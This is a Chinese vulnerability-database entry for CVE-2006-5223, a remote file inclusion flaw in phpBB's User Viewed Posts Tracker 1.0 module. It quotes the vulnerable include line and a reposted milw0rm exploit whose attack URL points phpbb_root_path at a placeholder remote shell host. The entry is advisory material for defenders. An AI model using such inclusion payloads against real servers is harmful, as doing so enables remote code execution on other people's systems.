phpBB User Viewed Posts Tracker模块phpbb_root_path变量远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111206 漏洞类型 输入验证
发布时间 2006-10-06 更新时间 2007-07-06
CVE编号 CVE-2006-5223 CNNVD-ID CNNVD-200610-111
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2483
https://www.securityfocus.com/bid/20385
https://cxsecurity.com/issue/WLB-2006100070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-111
|漏洞详情
phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。phpBB的UserViewedPostsTracker模块在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。phpBB的UserViewedPostsTracker模块没有正确地验证phpbb_root_path参数的输入,攻击者可以通过包含本地或外部资源的任意文件导致执行任意PHP代码。漏洞代码如下:include_once($phpbb_root_path.'language/lang_'.$board_config['default_lang'].'/lang_user_viewed_posts.'.$phpEx);
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: include_once($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_user_viewed_posts.' . $phpEx);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-06]
|受影响的产品
Nivisec User Viewed Posts Tracker 1.0
|参考资料

来源:XF
名称:phpbb-phpbbrootpath-file-include(29383)
链接:http://xforce.iss.net/xforce/xfdb/29383
来源:BID
名称:20385
链接:http://www.securityfocus.com/bid/20385
来源:BUGTRAQ
名称:20061012AdminUserViewedPostsTrackerRemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448445/100/0/threaded
来源:BUGTRAQ
名称:20061006phpBBUserViewedPostsTrackerVersion<=1.0[phpbb_root_path]FileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/447932/100/0/threaded
来源:MILW0RM
名称:2483
链接:http://www.milw0rm.com/exploits/2483
来源:VUPEN
名称:ADV-2006-3947
链接:http://www.frsirt.com/english/advisories/2006/3947
来源:SECUNIA
名称:22305
链接:http://secunia.com/advisories/22305
来源:www.nivisec.com
链接:http://www.nivisec.com/article.php?l=vi&ar=19
来源:SREASON
名称:1705
链接:http://securityreason.com/securityalert/1705
来源:MILW0RM
名称:2483
链接:http://milw0rm.com/exploits/2483